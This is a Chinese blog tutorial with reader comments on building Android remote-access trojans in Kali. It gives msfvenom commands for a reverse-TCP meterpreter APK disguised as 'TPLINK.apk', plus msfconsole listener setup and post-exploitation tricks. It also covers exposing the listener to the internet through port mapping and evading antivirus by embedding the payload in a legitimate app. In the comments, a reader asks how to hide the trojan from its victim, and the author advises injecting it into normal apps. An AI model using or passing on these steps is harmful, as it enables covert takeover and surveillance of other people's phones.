逍遥子

kali下android木马那些事
普通版在kali中我们可以利用msfvenom来生成一个Android木马。命令如下:msfvenom -p an...
扫描右侧二维码阅读全文
25
2018/11

kali下android木马那些事

普通版

kali中我们可以利用msfvenom来生成一个Android木马。命令如下:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.232.195 LPORT=5555 R > TPLINK.apk

这样便生成了一个名为TPLINK.apk的Android木马。
1.png
然后我们配合msfcosole进行攻击即可。

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LPORT 5555
exploit

手机端安装并执行,成功获得shell。

一些另外的玩法

给手机播放视频和音频文件(需更新到最新版的msf)

命令格式: paly /root/xxx.mp3 mp4
2.png

修改手机壁纸

background
use post/multi/manage/set_wallpaper
sessions
set sessions id
set WALLPAPER_FILE JPG
exploit

晋级玩法

利用armitage图形化管理工具
3.png

可视化的文件管理

4.png

骨灰级

外网木马

我们可以利用花生壳进行端口映射完成外网木马的渗透测试,添加端口如下!
5.png
然后在kali中设置花生壳的端口和ip地址即可。
那么!你还有那些另类的玩法呢?一起在下方交流吧。

木马免杀

对于以上的木马,是无法通过杀毒软件的查杀的,我们可以将payload加入到正常的APP中,来起来免杀的效果。
命令:

msfvenom -p -x test.apk android/meterpreter/reverse_tcp LHOST=192.168.232.195 LPORT=5555 R > kali.apk

命令详解:
-x: 后跟原生态app
生成的kali.apk为新的木马文件。

视频演示

Last modification:December 30th, 2018 at 05:55 pm
正在沿街乞讨中……

Leave a Comment

29 comments

  1. 尴尬死了我是尴尬哥

    普通版的应用程是什么,msfvenom是不是就是普通的终端。

    1. 逍遥子
      @尴尬死了我是尴尬哥

      普通的就是只能内网玩,不能免杀!

  2. 尴尬死了我是尴尬哥

    请问我在手机上运行了木马,可是我的kali终端没有反应,是不是我的电脑有问题还是我的操作问题?

    1. 逍遥子
      @尴尬死了我是尴尬哥

      手机和kali不在同一网段造成的!参考文章https://bbskali.cn/forum.php?mod=viewthread&tid=1728&mobile=2

  3. 尴尬死了我是尴尬哥

    为什么我在手机运行了可是我的kali linux终端没有反应

  4. 马云:今天你充钱了吗?

    怎么在kali中设置 花生壳端口映射?

    1. 逍遥子
      @马云:今天你充钱了吗?

      生成木马填写花生壳的IP和端口!配置msf时填写内网的IP和端口!

      1. 马云:今天你充钱了吗?
        @逍遥子

        为啥不行?可以加下你扣吗?

      2. 马云:今天你充钱了吗?
        @逍遥子

        花生壳的ip和端口就是在添加时设置的ip和端口吗?

  5. 嗯嗯

    有iOS的嘛

    1. 逍遥子
      @嗯嗯

      没有的

  6. 手机要填IP吗

    1. 逍遥子
      @嗯

      不需要!

  7. MR.ROBOT

    想问问怎么给apk加后门

  8. 爱走路的鹰

    ,,

  9. Alva

    大佬你好,有个问题哈,exploit之后,只有第一行,没有第二行Starting the payload handler 提示,这是咋回事啊?网络已桥接,,

    1. 逍遥子
      @Alva

      你好,生成木马用的IP地址必须为kali的IP。不是手机的IP。同时在msf中填写的IP和端口也要和生成木马时填写的相同!

      1. 杰哥哥
        @逍遥子

        需要无线网卡吗

        1. 逍遥子
          @杰哥哥

          不需要,在同一局域网就可以了。

          1. 杰哥哥
            @逍遥子

            为什么到最后就显示一行?

      2. duyukun
        @逍遥子

        生成之后我安装了,在手机上点击没有反应是为什么呀??还有就是虚拟机连网用什么模式,桥接还是NAT??再者就是我set LHOST和set LPORT之后用另一个控制台打开show options看到的是没有set之前的配置,为什么呀??求解,谢谢。

        1. 逍遥子
          @duyukun

          你好,msf生成的木马点了之后是没反应的,但是后台可以得到shell

        2. duyukun
          @duyukun

          请求回信,上面的问题解决了,好像只能桥接模式,但是我安装上之后没有权限,手动开的,有什么方法能让对方不知道,并且权限都是允许的?VX:dyk15829298797

          1. 逍遥子
            @duyukun

            你好,这是通病,你可以尝试给正常的APP中加入注入脚本!

  10. 北海一刀

    很基础的教程,感谢博主分享。

  11. poner

    超过18M的原生apk无法生成新的apk文件

  12. 邹宇浩

    哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈

  13. www

    msfvenom -p -x test.apk android/meterpreter/reverse_tcp LHOST=192.168.232.195 LPORT=5555 R > kali.apk实验时一直Invalid Payload Selected

    1. priess
      @www

      把test.apk换成你自己的apk文件。